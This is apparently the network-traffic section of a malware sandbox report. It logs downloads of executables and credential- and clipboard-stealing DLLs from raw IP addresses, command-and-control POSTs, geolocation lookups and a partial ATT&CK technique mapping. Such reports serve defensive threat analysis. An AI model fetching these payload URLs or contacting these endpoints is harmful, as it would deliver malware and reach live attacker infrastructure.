http://185.216.70.222/trafico.exe

http

8.1kB
467.0kB
173
338

HTTP Request

GET http://185.216.70.222/trafico.exe

HTTP Response

200
171.22.28.213:80

http://171.22.28.213/1.exe

http

19.1kB
1.1MB
411
801

HTTP Request

GET http://171.22.28.213/1.exe

HTTP Response

200
142.250.179.141:443

accounts.google.com

tls, http2

msedge.exe

999 B
5.8kB
9
8
142.250.179.141:443

https://accounts.google.com/InteractiveLogin?continue=https://accounts.google.com/&followup=https://accounts.google.com/&passive=1209600&ifkv=AYZoVhcK3fL3PuBZwnRtldzJbqu6VIgUGaY9vhD_m5KY7Y6LEnl2nO7S-BM-P9Rx8fVz0FzqcT4l8Q

tls, http2

msedge.exe

2.8kB
10.4kB
22
26

HTTP Request

GET https://accounts.google.com/

HTTP Request

GET https://accounts.google.com/ServiceLogin?passive=1209600&continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F

HTTP Request

GET https://accounts.google.com/InteractiveLogin?continue=https://accounts.google.com/&followup=https://accounts.google.com/&passive=1209600&ifkv=AYZoVhcK3fL3PuBZwnRtldzJbqu6VIgUGaY9vhD_m5KY7Y6LEnl2nO7S-BM-P9Rx8fVz0FzqcT4l8Q
157.240.201.35:443

www.facebook.com

tls

msedge.exe

29.0kB
327.1kB
179
268
157.240.201.35:443

www.facebook.com

tls

msedge.exe

989 B
3.0kB
9
7
157.240.221.16:443

static.xx.fbcdn.net

tls

msedge.exe

989 B
3.0kB
9
7
157.240.221.16:443

static.xx.fbcdn.net

tls

msedge.exe

989 B
3.0kB
9
7
157.240.221.16:443

static.xx.fbcdn.net

tls

msedge.exe

989 B
3.0kB
9
7
157.240.221.16:443

static.xx.fbcdn.net

tls

msedge.exe

989 B
3.0kB
9
7
157.240.221.16:443

static.xx.fbcdn.net

tls

msedge.exe

989 B
3.0kB
9
7
157.240.221.16:443

static.xx.fbcdn.net

tls

msedge.exe

19.2kB
423.6kB
292
404
157.240.221.35:443

facebook.com

tls

msedge.exe

1.7kB
4.0kB
14
15
157.240.221.35:443

fbcdn.net

tls

msedge.exe

1.9kB
5.1kB
16
19
77.91.124.1:80

http://77.91.124.1/theme/index.php

http

explothe.exe

512 B
365 B
6
5

HTTP Request

POST http://77.91.124.1/theme/index.php

HTTP Response

200
5.42.65.80:80

http://5.42.65.80/8bmeVwqx/index.php

http

oneetx.exe

468 B
367 B
5
4

HTTP Request

POST http://5.42.65.80/8bmeVwqx/index.php

HTTP Response

200
104.85.2.139:443

https://learn.microsoft.com/media/logos/logo_net.svg

tls, http2

msedge.exe

29.4kB
1.3MB
539
990

HTTP Request

GET https://learn.microsoft.com/dotnet/framework/install/application-not-started?version=(null)&processName=372F.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0

HTTP Response

301

HTTP Request

GET https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=372F.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0

HTTP Request

GET https://learn.microsoft.com/dotnet/framework/install/application-not-started?version=(null)&processName=372F.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0

HTTP Response

301

HTTP Response

200

HTTP Request

GET https://learn.microsoft.com/_themes/docs.theme/master/en-us/_themes/styles/fe274a7f.site-ltr.css

HTTP Request

GET https://learn.microsoft.com/static/third-party/adobe-target/at-js/2.9.0/at.js

HTTP Request

GET https://learn.microsoft.com/_themes/docs.theme/master/en-us/_themes/global/67a45209.deprecation.js

HTTP Request

GET https://learn.microsoft.com/_themes/docs.theme/master/en-us/_themes/scripts/f5d007b1.index-docs.js

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://learn.microsoft.com/static/third-party/MathJax/3.2.2/tex-mml-chtml.js

HTTP Response

200

HTTP Request

GET https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/app-could-not-be-started.png

HTTP Response

200

HTTP Request

GET https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/repair-tool-recommended-changes.png

HTTP Response

200

HTTP Request

GET https://learn.microsoft.com/en-us/content-nav/MSDocsHeader-DotNet.json?

HTTP Request

GET https://learn.microsoft.com/en-us/dotnet/framework/toc.json

HTTP Request

GET https://learn.microsoft.com/en-us/dotnet/breadcrumb/toc.json

HTTP Request

GET https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/repair-tool-changes-complete.png

HTTP Request

GET https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/repair-tool-no-resolution.png

HTTP Request

GET https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/install-3-5.png

HTTP Request

GET https://learn.microsoft.com/media/logos/logo_net.svg

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

301

HTTP Request

POST https://learn.microsoft.com/api/recommendations/c89966aa-b155-c98a-2391-47e01d468236/batch

HTTP Request

GET https://learn.microsoft.com/en-us/media/event-banners/banner-ignite-2023-flatcolor.png?branch=live

HTTP Response

200

HTTP Request

GET https://learn.microsoft.com/_themes/docs.theme/master/en-us/_themes/styles/docons.28d69bd4.woff2

HTTP Request

GET https://learn.microsoft.com/en-us/media/logos/logo_net.svg

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://learn.microsoft.com/favicon.ico

HTTP Response

200

HTTP Request

POST https://learn.microsoft.com/api/recommendations/c89966aa-b155-c98a-2391-47e01d468236/batch

HTTP Response

200

HTTP Request

GET https://learn.microsoft.com/media/logos/logo_net.svg

HTTP Response

301
171.22.28.202:16706

5009.exe

617.5kB
20.4kB
457
289
185.196.9.65:80

http

5308.exe

1.5MB
20.9kB
1094
336
13.107.246.67:443

https://wcpstatic.microsoft.com/mscc/lib/v2/wcp-consent.js

tls, http2

msedge.exe

3.7kB
91.3kB
54
78

HTTP Request

GET https://wcpstatic.microsoft.com/mscc/lib/v2/wcp-consent.js

HTTP Response

200
85.209.176.171:80

http://85.209.176.171/

http

475D.exe

6.1MB
92.4kB
4417
1616

HTTP Request

POST http://85.209.176.171/

HTTP Response

200

HTTP Request

POST http://85.209.176.171/

HTTP Response

200

HTTP Request

POST http://85.209.176.171/

HTTP Response

200

HTTP Response

100
13.107.246.67:443

js.monitor.azure.com

tls, http2

msedge.exe

3.6kB
6.9kB
11
13
13.107.246.67:443

https://js.monitor.azure.com/scripts/c/ms.jsll-3.min.js

tls, http2

msedge.exe

5.8kB
72.4kB
48
64

HTTP Request

GET https://js.monitor.azure.com/scripts/c/ms.jsll-3.min.js

HTTP Response

200
77.91.124.55:19071

2QN962xW.exe

260 B
5
185.216.70.238:37515

vbc.exe

2.2MB
39.5kB
1644
824
52.210.204.82:443

mscom.demdex.net

tls

msedge.exe

1.0kB
4.9kB
8
9
77.91.124.55:19071

AppLaunch.exe

260 B
5
104.26.12.31:443

https://api.ip.sb/ip

tls, http

5308.exe

710 B
3.8kB
8
7

HTTP Request

GET https://api.ip.sb/ip

HTTP Response

200
104.208.16.89:443

https://browser.events.data.microsoft.com/OneCollector/1.0/?cors=true&content-type=application/x-json-stream&ext.intweb.msfpc=GUID%3Dec0a3a472a5447f09b6cc4f266400c4c%26HASH%3Dec0a%26LV%3D202310%26V%3D4%26LU%3D1697143717178&w=0

tls, http2

msedge.exe

2.1kB
7.4kB
14
13

HTTP Request

OPTIONS https://browser.events.data.microsoft.com/OneCollector/1.0/?cors=true&content-type=application/x-json-stream&w=0

HTTP Response

200

HTTP Request

OPTIONS https://browser.events.data.microsoft.com/OneCollector/1.0/?cors=true&content-type=application/x-json-stream&ext.intweb.msfpc=GUID%3Dec0a3a472a5447f09b6cc4f266400c4c%26HASH%3Dec0a%26LV%3D202310%26V%3D4%26LU%3D1697143717178&w=0

HTTP Response

200
104.208.16.89:443

https://browser.events.data.microsoft.com/OneCollector/1.0/?cors=true&content-type=application/x-json-stream&ext.intweb.msfpc=GUID%3Dec0a3a472a5447f09b6cc4f266400c4c%26HASH%3Dec0a%26LV%3D202310%26V%3D4%26LU%3D1697143717178&w=0

tls, http2

msedge.exe

26.6kB
10.5kB
48
43

HTTP Request

POST https://browser.events.data.microsoft.com/OneCollector/1.0/?cors=true&content-type=application/x-json-stream&w=0

HTTP Response

200

HTTP Request

POST https://browser.events.data.microsoft.com/OneCollector/1.0/?cors=true&content-type=application/x-json-stream&w=0

HTTP Response

200

HTTP Request

POST https://browser.events.data.microsoft.com/OneCollector/1.0/?cors=true&content-type=application/x-json-stream&ext.intweb.msfpc=GUID%3Dec0a3a472a5447f09b6cc4f266400c4c%26HASH%3Dec0a%26LV%3D202310%26V%3D4%26LU%3D1697143717178&w=0

HTTP Response

200

HTTP Request

POST https://browser.events.data.microsoft.com/OneCollector/1.0/?cors=true&content-type=application/x-json-stream&ext.intweb.msfpc=GUID%3Dec0a3a472a5447f09b6cc4f266400c4c%26HASH%3Dec0a%26LV%3D202310%26V%3D4%26LU%3D1697143717178&w=0

HTTP Response

200

HTTP Request

POST https://browser.events.data.microsoft.com/OneCollector/1.0/?cors=true&content-type=application/x-json-stream&ext.intweb.msfpc=GUID%3Dec0a3a472a5447f09b6cc4f266400c4c%26HASH%3Dec0a%26LV%3D202310%26V%3D4%26LU%3D1697143717178&w=0

HTTP Response

200

HTTP Request

POST https://browser.events.data.microsoft.com/OneCollector/1.0/?cors=true&content-type=application/x-json-stream&ext.intweb.msfpc=GUID%3Dec0a3a472a5447f09b6cc4f266400c4c%26HASH%3Dec0a%26LV%3D202310%26V%3D4%26LU%3D1697143717178&w=0

HTTP Response

200

HTTP Request

POST https://browser.events.data.microsoft.com/OneCollector/1.0/?cors=true&content-type=application/x-json-stream&ext.intweb.msfpc=GUID%3Dec0a3a472a5447f09b6cc4f266400c4c%26HASH%3Dec0a%26LV%3D202310%26V%3D4%26LU%3D1697143717178&w=0

HTTP Response

200
104.26.12.31:443

https://api.ip.sb/geoip

tls, http

475D.exe

667 B
4.1kB
7
7

HTTP Request

GET https://api.ip.sb/geoip

HTTP Response

200
77.91.124.1:80

http://77.91.124.1/theme/Plugins/clip64.dll

http

explothe.exe

3.8kB
94.8kB
75
74

HTTP Request

GET http://77.91.124.1/theme/Plugins/cred64.dll

HTTP Response

404

HTTP Request

GET http://77.91.124.1/theme/Plugins/clip64.dll

HTTP Response

200
142.251.36.14:443

https://play.google.com/log?format=json&hasfast=true&authuser=0

tls, http2

msedge.exe

1.7kB
8.5kB
14
15

HTTP Request

OPTIONS https://play.google.com/log?format=json&hasfast=true&authuser=0
89.23.98.197:44597

5A1E.exe

2.5MB
40.1kB
1810
841
204.79.197.200:443

tse1.mm.bing.net

tls, http2

1.1kB
8.2kB
14
13
204.79.197.200:443

tse1.mm.bing.net

tls, http2

1.2kB
8.3kB
15
14
204.79.197.200:443

tse1.mm.bing.net

tls, http2

1.2kB
8.3kB
15
14
204.79.197.200:443

https://tse1.mm.bing.net/th?id=OADD2.10239317301364_1Z8KBZ9IPN02ZTCGX&pid=21.2&w=1080&h=1920&c=4

tls, http2

108.0kB
2.8MB
2299
2058

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239317301145_1Y8CXK45BT2OHNQQQ&pid=21.2&w=1920&h=1080&c=4

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239317301554_133DWC45UAH2W18HX&pid=21.2&w=1080&h=1920&c=4

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239317301168_16G64C18QUW861YM2&pid=21.2&w=1920&h=1080&c=4

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239317301577_1B5OIQ9XH8JLMH3HW&pid=21.2&w=1080&h=1920&c=4

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239317300969_156V9EGCLLGG8U764&pid=21.2&w=1920&h=1080&c=4

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239317301402_14KUDKAGB5S6I0PY4&pid=21.2&w=1080&h=1920&c=4

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239317301657_1A2Y2HPL5GA07URZQ&pid=21.2&w=1080&h=1920&c=4

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239317301248_1XIEMIBBUMA1BDE5T&pid=21.2&w=1920&h=1080&c=4

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239317301143_11K66B0WIWZ9F4H58&pid=21.2&w=1920&h=1080&c=4

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239317300931_116ZGE2JLLUHLMEDS&pid=21.2&w=1920&h=1080&c=4

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239317301364_1Z8KBZ9IPN02ZTCGX&pid=21.2&w=1080&h=1920&c=4
77.91.124.55:19071

2QN962xW.exe

208 B
4
77.91.124.55:19071

AppLaunch.exe

208 B
4

8.8.8.8:53

72.32.126.40.in-addr.arpa

dns

71 B
157 B
1
1

DNS Request

72.32.126.40.in-addr.arpa
8.8.8.8:53

8.8.8.8.in-addr.arpa

dns

66 B
90 B
1
1

DNS Request

8.8.8.8.in-addr.arpa
8.8.8.8:53

126.22.238.8.in-addr.arpa

dns

71 B
125 B
1
1

DNS Request

126.22.238.8.in-addr.arpa
8.8.8.8:53

95.221.229.192.in-addr.arpa

dns

73 B
144 B
1
1

DNS Request

95.221.229.192.in-addr.arpa
8.8.8.8:53

241.154.82.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

241.154.82.20.in-addr.arpa
8.8.8.8:53

59.128.231.4.in-addr.arpa

dns

71 B
157 B
1
1

DNS Request

59.128.231.4.in-addr.arpa
8.8.8.8:53

29.81.57.23.in-addr.arpa

dns

70 B
133 B
1
1

DNS Request

29.81.57.23.in-addr.arpa
8.8.8.8:53

26.35.223.20.in-addr.arpa

dns

71 B
157 B
1
1

DNS Request

26.35.223.20.in-addr.arpa
8.8.8.8:53

23.159.190.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

23.159.190.20.in-addr.arpa
8.8.8.8:53

29.68.91.77.in-addr.arpa

dns

70 B
107 B
1
1

DNS Request

29.68.91.77.in-addr.arpa
8.8.8.8:53

52.68.91.77.in-addr.arpa

dns

70 B
107 B
1
1

DNS Request

52.68.91.77.in-addr.arpa
8.8.8.8:53

50.23.12.20.in-addr.arpa

dns

70 B
156 B
1
1

DNS Request

50.23.12.20.in-addr.arpa
8.8.8.8:53

211.92.42.5.in-addr.arpa

dns

70 B
107 B
1
1

DNS Request

211.92.42.5.in-addr.arpa
8.8.8.8:53

80.65.42.5.in-addr.arpa

dns

69 B
129 B
1
1

DNS Request

80.65.42.5.in-addr.arpa
8.8.8.8:53

206.23.85.13.in-addr.arpa

dns

71 B
145 B
1
1

DNS Request

206.23.85.13.in-addr.arpa
8.8.8.8:53

222.70.216.185.in-addr.arpa

dns

73 B
133 B
1
1

DNS Request

222.70.216.185.in-addr.arpa
8.8.8.8:53

254.3.248.8.in-addr.arpa

dns

70 B
124 B
1
1

DNS Request

254.3.248.8.in-addr.arpa
8.8.8.8:53

213.28.22.171.in-addr.arpa

dns

72 B
133 B
1
1

DNS Request

213.28.22.171.in-addr.arpa
8.8.8.8:53

accounts.google.com

dns

msedge.exe

65 B
81 B
1
1

DNS Request

accounts.google.com

DNS Response

142.250.179.141
8.8.8.8:53

www.facebook.com

dns

msedge.exe

62 B
107 B
1
1

DNS Request

www.facebook.com

DNS Response

157.240.201.35
142.250.179.141:443

accounts.google.com

https

msedge.exe

7.0kB
122.8kB
57
100
8.8.8.8:53

208.194.73.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

208.194.73.20.in-addr.arpa
8.8.8.8:53

141.179.250.142.in-addr.arpa

dns

74 B
113 B
1
1

DNS Request

141.179.250.142.in-addr.arpa
8.8.8.8:53

35.201.240.157.in-addr.arpa

dns

73 B
126 B
1
1

DNS Request

35.201.240.157.in-addr.arpa
8.8.8.8:53

static.xx.fbcdn.net

dns

msedge.exe

65 B
104 B
1
1

DNS Request

static.xx.fbcdn.net

DNS Response

157.240.221.16
8.8.8.8:53

16.221.240.157.in-addr.arpa

dns

73 B
117 B
1
1

DNS Request

16.221.240.157.in-addr.arpa
8.8.8.8:53

facebook.com

dns

msedge.exe

58 B
74 B
1
1

DNS Request

facebook.com

DNS Response

157.240.221.35
8.8.8.8:53

fbcdn.net

dns

msedge.exe

55 B
71 B
1
1

DNS Request

fbcdn.net

DNS Response

157.240.221.35
8.8.8.8:53

35.221.240.157.in-addr.arpa

dns

73 B
126 B
1
1

DNS Request

35.221.240.157.in-addr.arpa
8.8.8.8:53

fbsbx.com

dns

msedge.exe

55 B
71 B
1
1

DNS Request

fbsbx.com

DNS Response

157.240.221.35
8.8.8.8:53

2.136.104.51.in-addr.arpa

dns

71 B
157 B
1
1

DNS Request

2.136.104.51.in-addr.arpa
224.0.0.251:5353

msedge.exe

520 B
8
8.8.8.8:53

195.179.250.142.in-addr.arpa

dns

74 B
112 B
1
1

DNS Request

195.179.250.142.in-addr.arpa
8.8.8.8:53

1.124.91.77.in-addr.arpa

dns

70 B
83 B
1
1

DNS Request

1.124.91.77.in-addr.arpa
8.8.8.8:53

131.179.250.142.in-addr.arpa

dns

74 B
112 B
1
1

DNS Request

131.179.250.142.in-addr.arpa
142.250.179.141:443

accounts.google.com

https

msedge.exe

4.9kB
5.3kB
15
20
8.8.8.8:53

learn.microsoft.com

dns

msedge.exe

130 B
540 B
2
2

DNS Request

learn.microsoft.com

DNS Response

104.85.2.139

DNS Request

learn.microsoft.com

DNS Response

104.85.2.139
8.8.8.8:53

59.82.57.23.in-addr.arpa

dns

70 B
133 B
1
1

DNS Request

59.82.57.23.in-addr.arpa
8.8.8.8:53

139.2.85.104.in-addr.arpa

dns

142 B
270 B
2
2

DNS Request

139.2.85.104.in-addr.arpa

DNS Request

139.2.85.104.in-addr.arpa
8.8.8.8:53

202.28.22.171.in-addr.arpa

dns

144 B
266 B
2
2

DNS Request

202.28.22.171.in-addr.arpa

DNS Request

202.28.22.171.in-addr.arpa
8.8.8.8:53

65.9.196.185.in-addr.arpa

dns

142 B
280 B
2
2

DNS Request

65.9.196.185.in-addr.arpa

DNS Request

65.9.196.185.in-addr.arpa
8.8.8.8:53

wcpstatic.microsoft.com

dns

msedge.exe

138 B
512 B
2
2

DNS Request

wcpstatic.microsoft.com

DNS Request

wcpstatic.microsoft.com

DNS Response

13.107.246.67

13.107.213.67

DNS Response

13.107.246.67

13.107.213.67
8.8.8.8:53

js.monitor.azure.com

dns

msedge.exe

132 B
546 B
2
2

DNS Request

js.monitor.azure.com

DNS Request

js.monitor.azure.com

DNS Response

13.107.246.67

13.107.213.67

DNS Response

13.107.246.67

13.107.213.67
8.8.8.8:53

mscom.demdex.net

dns

msedge.exe

124 B
600 B
2
2

DNS Request

mscom.demdex.net

DNS Response

52.210.204.82

63.34.77.44

34.253.158.202

52.31.123.248

34.255.45.168

99.81.14.86

34.255.92.83

34.247.108.36

DNS Request

mscom.demdex.net

DNS Response

52.210.204.82

63.34.77.44

34.253.158.202

52.31.123.248

34.255.45.168

99.81.14.86

34.255.92.83

34.247.108.36
8.8.8.8:53

microsoftmscompoc.tt.omtrdc.net

dns

msedge.exe

77 B
212 B
1
1

DNS Request

microsoftmscompoc.tt.omtrdc.net

DNS Response

66.235.152.113

66.235.152.152

66.235.152.115

66.235.152.126

66.235.152.107

66.235.152.143
8.8.8.8:53

target.microsoft.com

dns

msedge.exe

66 B
246 B
1
1

DNS Request

target.microsoft.com

DNS Response

66.235.152.152

66.235.152.115

66.235.152.126

66.235.152.107

66.235.152.143

66.235.152.113
8.8.8.8:53

67.246.107.13.in-addr.arpa

dns

144 B
316 B
2
2

DNS Request

67.246.107.13.in-addr.arpa

DNS Request

67.246.107.13.in-addr.arpa
8.8.8.8:53

171.176.209.85.in-addr.arpa

dns

146 B
318 B
2
2

DNS Request

171.176.209.85.in-addr.arpa

DNS Request

171.176.209.85.in-addr.arpa
8.8.8.8:53

238.70.216.185.in-addr.arpa

dns

73 B
133 B
1
1

DNS Request

238.70.216.185.in-addr.arpa
8.8.8.8:53

82.204.210.52.in-addr.arpa

dns

72 B
135 B
1
1

DNS Request

82.204.210.52.in-addr.arpa
8.8.8.8:53

api.ip.sb

dns

475D.exe

55 B
145 B
1
1

DNS Request

api.ip.sb

DNS Response

104.26.12.31

104.26.13.31

172.67.75.172
8.8.8.8:53

31.12.26.104.in-addr.arpa

dns

142 B
266 B
2
2

DNS Request

31.12.26.104.in-addr.arpa

DNS Request

31.12.26.104.in-addr.arpa
8.8.8.8:53

browser.events.data.microsoft.com

dns

msedge.exe

79 B
203 B
1
1

DNS Request

browser.events.data.microsoft.com

DNS Response

104.208.16.89
8.8.8.8:53

89.16.208.104.in-addr.arpa

dns

72 B
146 B
1
1

DNS Request

89.16.208.104.in-addr.arpa
8.8.8.8:53

play.google.com

dns

msedge.exe

61 B
77 B
1
1

DNS Request

play.google.com

DNS Response

142.251.36.14
142.251.36.14:443

play.google.com

https

msedge.exe

5.0kB
9.2kB
12
13
8.8.8.8:53

14.36.251.142.in-addr.arpa

dns

72 B
111 B
1
1

DNS Request

14.36.251.142.in-addr.arpa
8.8.8.8:53

137.71.105.51.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

137.71.105.51.in-addr.arpa
8.8.8.8:53

197.98.23.89.in-addr.arpa

dns

142 B
262 B
2
2

DNS Request

197.98.23.89.in-addr.arpa

DNS Request

197.98.23.89.in-addr.arpa
8.8.8.8:53

tse1.mm.bing.net

dns

124 B
346 B
2
2

DNS Request

tse1.mm.bing.net

DNS Request

tse1.mm.bing.net

DNS Response

204.79.197.200

13.107.21.200

DNS Response

204.79.197.200

13.107.21.200
142.250.179.141:443

accounts.google.com

https

msedge.exe

3.0kB
4.8kB
12
13
8.8.8.8:53

196.168.217.172.in-addr.arpa

dns

148 B
112 B
2
1

DNS Request

196.168.217.172.in-addr.arpa

DNS Request

196.168.217.172.in-addr.arpa
142.251.36.14:443

play.google.com

https

msedge.exe

4.0kB
3.5kB
11
12

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

Scripting

T1064

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

Defense Evasion

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

Scripting

T1064

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Peripheral Device Discovery

T1120

Query Registry

System Information Discovery